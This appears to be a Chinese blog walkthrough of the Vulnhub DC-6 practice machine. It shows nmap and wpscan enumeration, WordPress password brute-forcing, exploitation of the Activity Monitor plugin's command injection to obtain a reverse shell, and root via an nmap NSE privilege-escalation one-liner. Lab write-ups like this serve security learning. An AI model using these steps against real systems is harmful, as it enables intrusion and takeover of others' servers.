【CyberSecurityLearning 75】DC系列之DC-6渗透测试(WordPress)

最新推荐文章于 2024-03-28 10:56:49 发布
最新推荐文章于 2024-03-28 10:56:49 发布
阅读量448 收藏 1
点赞数
分类专栏: CyberSecurityLearning 靶场练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Waffle666/article/details/116559294
版权

目录

DC-6靶机渗透测试

1、信息收集

1.1 发现DC-6的IP地址

1.2 扫描开放端口

1.3 访问web网页(添加本地DNS解析)

1.4 Wpscan扫描站点(用户名)

2、WEB渗透

2.1 爆破WordPress站点用户名和密码

2.2 爆破后台路径

2.3、activity monitor漏洞利用

2.4  进入mark的家目录

2.5、反弹jens用户的shell

3、通过nmap提权

 

DC-6靶机渗透测试

0x00实验环境

靶机:DC-6,MAC地址:00:0C:29:85:9D:FD(192.168.3.190)

测试机:Kali,IP地址:192.168.3.188

1、信息收集

1.1 发现DC-6的IP地址

利用DC-6的MAC地址找到IP
命令:nmap -sP 192.168.3.1/24 -oN nmap.sP
发现DC-6的IP为192.168.3.190

1.2 扫描开放端口

nmap -A 192.168.3.190 -p 1-65535 -oN nmap.A

发现开放了22端口和80端口

以及:http-title: Did not follow redirect to http://wordy/    访问ip后会重定向到http://wordy/

1.3 访问web网页(添加本地DNS解析)

本机访问192.168.3.190,发现网页打不开,是因为没有添加本地DNS解析

我们在本机C:\Windows\System32\drivers\etc的hosts文件中添加

本地添加DNS解析之后,刷新后发现能成功访问(我们原来输入的是IP地址,它会自动跳转到wordy)

发现:
Wordy
Just another WordPress site

是一个WordPress(是国外三大开源的PHP CMS 之一)

除了本地需要修改hosts文件,那我们用kali虚拟机去访问目标80端口的时候,我们也需要去修改一下本机的host文件
vim /etc/hosts

1.4 Wpscan扫描站点(用户名)

wpscan --url wordy -e u           列出WordPress用户和账号

u枚举用户名,默认从1-10
--enumerate-e [option(s)]  枚举
--url-u  要扫描的`WordPress`站点.

在使用wpscan之前我们要做一个工具的更新:   wpscan --update    更新工具

2、WEB渗透

2.1 爆破WordPress站点用户名和密码

扫描后发现存在admin、sarah、graham、mark、jens用户,尝试爆破出密码

DC-6的作者在这里也给出了密码的提示https://www.vulnhub.com/entry/dc-6,315/

OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ;-)

先把admin、sarah、graham、mark、jens用户写在user.dic

wpscan --url wordy -U user.dic -P passwords.txt(使用wpscan爆破WordPress站点用户名和密码)

Username: mark,
Password: helpdesk01

2.2 爆破后台路径

Robots.txt 有时会写着,在一个一般开源cms都是有固定后台的,比如joomla后台路径就是administrator ,wordpress的就是wp_admin ,dedecms就是dede 常用的还有admin login manger 等等

登录后台:

发现使用了activity monitor插件

2.3、activity monitor漏洞利用

百度搜索其漏洞:http://blog.nsfocus.net/cve-2018-15877/

或者kali搜索其插件漏洞:
searchsploit active monitor

存在远程执行漏洞可以反弹shell 到本地

cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html

打开45274.html,修改如下两处地方

python -m SimpleHTTPServer

当前目录下开启http 服务

本机Submit request

本地再监听9999,发现没有反弹成功诶!

burp抓包看看:发现后面加管道符可以执行代码

可以看到漏洞说的确存在的,那么我们下一步就弹shell

我们现在本地监听一下:nc -lvvp 2333

抓包改包、放包

连接成功:

进入交互式shell

2.4  进入mark的家目录

- Add new user: graham - GSo7isUM1D4 - done

得到用户graham的密码,用ssh远程登录

检查sudo权限

可以看到 “backups.sh” 不需要密码,即可修改

利用这个sh脚本可以直接获取到jens的shell

2.5、反弹jens用户的shell

sudo -l看一下

 

3、通过nmap提权

nmap提权可以参考:https://gtfobins.github.io/gtfobins/nmap/#shell

echo "os.execute('/bin/bash')" >> root.nse    #将os.execute('/bin/bash')写入到root.nse文件中

sudo nmap --script=root.nse                         #利用nmap插件执行/bin/bash来获取root权限

1、用wpscan扫描用户名和爆破密码

2、activity monitor命令执行漏洞的利用

3、通过nmap插件来反弹shell

Wαff1ε
关注
专栏目录
对日本某Wordpress博客站的一次渗透测试
白帽渗透笔记的博客
08-26 694
阅读本文大概需要 2.3 分钟 今天,又是忙碌且充实的一天。 下班回到家的我,又在用 FOFA 扫网站,然后便扫到一个日本网友的博客站点。这界面风格,一看就是 Wordpress 了,网站底部也可以看到 Wordpress 的字样。 只有寥寥无几的博文,并且最近一条还是在 3 年前。 我浏览器装了 Wappalyzer 插件,插件显示了如下信息。 4.5.3 ?这是好久以前的版本了,看来博主确实很久没打理这个网站了。 不过看到这个版本号,我顿时来了精神了。因为我想起 Wordpress <= .
python渗透测试入门之wordpress登录
ailx10
06-13 687
近期收到了电子工业出版社赠送的一本网络安全书籍《python黑帽子》,书中一共24个实验,今天复现第14个实验(密码猜测),我的测试环境是mbp电脑+同事的wordpress站点+conda开发环境。有一说一,弱口令是脆弱的,但是复杂密码根本猜不出来,需要分析站点POST请求和响应是值得肯定的,但是等着耗着CPU和网络是不可取的~1、查阅wordpress站点登录页面源代码首先GET请求,接受返回...
kali searchsploit命令
Jingged的博客
03-28 474
searchsploit命令的基本用法是提供搜索词来搜索漏洞利用。该命令将仅搜索漏洞标题中包含"apache struts"的漏洞利用。该命令将显示与"windows local"相关的漏洞利用的详细信息。该命令将搜索与CVE编号"2021-1234"相关的漏洞利用。该命令将搜索所有与WordPress相关的漏洞利用。该命令将搜索不包含"dos"和"poc"的漏洞利用。
DC-2靶机渗透测试记录
热门推荐
qq_33163046的博客
12-22 1万+
攻击机 kali-linux-2020.4-vbox-i386 设置 USB设备关闭,网络连接方式仅主机(Host-Only)网络。 攻击机IP 192.168.56.103 步骤1 靶机目标发现 因为靶机和攻击机在同一个网络内,所以使用KALI上arp-scan -l 进行扫描。扫描确定了靶机的IP是192.168.56.104。 ┌──(root??kali)-[/etc] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 0...
NMAP对企业环境实施安全检查
Eric.zhong
03-14 1583
文章目录NMAP介绍常用命令1. 查询网段内在线主机2. 扫描在线主机的开放服务3. 目标主机详细信息4. NES脚本扫描5. 在局域网上扫找 Conficker 蠕虫病毒7. 邮件安全检查8. 数据库安全检查8. 扫描网段内的SNMP信息9. 扫描网段内的LDAP服务安全检查10. HTTP相关安全检查11. SMB相关安全检查常用端口与渗透风险 NMAP介绍 Nmap是一款开源免费的网络发现(...
vuInhub靶场实战系列-DC-6实战
最新发布
05-29
vuInhub靶场实战系列-DC-6实战
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC系列漏洞靶场-渗透测试学习复现(DC-2)
W983079520的博客
11-03 1902
DC-2是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了vi提权和git提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-2靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个: 80(http默认端口)和运行着SSH服务的7744端口。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
干货 | Wordpress网站渗透方法指南
leah126的博客
05-03 2727
如果您遇到使用 WordPress 的网站,您会怎么做,渗透思路和安全检测思路?
2021Kali系列 -- 漏洞搜索(searchsploit)
weixin_41489908的博客
04-22 4291
我以为我不理你,你会难过,可结果呢,难过的是我。。。 ---- 网易云热评 简介:通过搜索关键词找到需要的漏洞,可以理解为一个离线的漏洞库 一、命令 searchsploit 1、-c --case搜索时区分大小写,默认不区分大小写 2、-e --exact 精确搜索,比如:搜索“ WordPress 4.1”时,结果绝对不会出现 “WordPress Core 4.1” 3、-s --strict 精确搜索,输入值必须存在 4、-t --tittle搜索exploit标题 5、-...
vulnhub DC6 靶场练习
鸥鹭忘机
08-19 569
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第六台,下载地址为https://www.vulnhub.com/entry/dc-6,315/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。 这次在靶机下载的页面,官方给出的线索,在接下来的破解中需要用到这条线索。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。 然后
wordpress search.php,WordPress搜索小工具详解
weixin_33793620的博客
04-15 1028
WordPress搜索小工具支持我们在侧边栏加入搜索框功能,搜索是网站必不可少的功能,今天WordPress头条带大家剖析WordPress搜索小工具的源码、细节、和自定义WordPress搜索小工具。图1 WordPress搜索小工具WordPress搜索小工具使用介绍在网站【后台-外观-小工具】中找到搜索,将它拖到想要展示的侧边栏中。图2 搜索小工具的设置WordPress搜索小工具没什么设置...
渗透测试学习之靶机DC-6
情感博主V
03-13 396
过程 1. 探测目标主机 nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.143 2. 信息搜集 端口信息 nmap -sV -p 1-65535 192.168.246.143 web站点相关服务信息 访问该IP的80端口,http://192.168.246.143:80 页面跳转到了http://wordy,跟前面的DC-2一样,在C:\...
DC-6靶机实战练习
千寻的博客
03-23 1054
环境:VMware 15虚拟机软件 DC-7靶机IP地址:192.168.146.136 Kali的IP地址:192.168.146.130 文章目录第一步 主机扫描第二步 扫描开放的端口第三步 访问80端口---此时需要重定向设置第四步 扫描后台目录 以及账号密码第五步 获取登录账号和密码第六步 登录mark账号-第七步 漏洞利用第八步 kali开启临时http服务 访问45274.html页面...
vulnhub靶机DC-6渗透笔记
liver100day的博客
06-22 416
靶机环境搭建 渗透机: kali IP地址:192.158.75.128 靶机: DC-6 IP地址:位置 靶机下载地址:https://www.vulnhub.com/entry/dc-6,315/ 渗透过程 1.信息收集 1.1 主机发现 arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) 也可以使用namp进行主机发现 nmap 192.168.75.0/24 同样扫描出了目标靶机IP地址,并且还扫描出了目标开启了22(ssh)和 80(http) 两种扫
DC-6 主要在于命令执行漏洞利用和横向越权
jelly
06-29 1788
靶机:DC-6 192.168.56.107 攻击机:kali 192.168.56.1 作者提示: OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job. cat /us
搭建WordPress渗透测试靶机
D-R0s1的博客
01-24 3515
        想要提高自己在实战中渗透的技术,就要在靶机中不断地训练,今天和大家一起搭建一个WordPress网站的渗透环境,文章很基础,希望可以帮到像我一样的技术小白。 第一步:         我们需要在https://www.turnkeylinux.org/wordpress中下载镜像,因为网站是全英文的,所以在这里我给大家附上几张图,大家根据图示就可以轻松的找到下载的地方。 ...
华普莱特HDE系列DC-DC电源模块技术规格
"华普莱特HDE系列DC-DC电源模块是北京华普莱特科技发展有限公司推出的大功率模块电源产品,适用于多种电压输入范围,具有高效能、高稳定性的特点。产品手册提供了详细的技术参数和选型指导,包括模块的外形尺寸、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值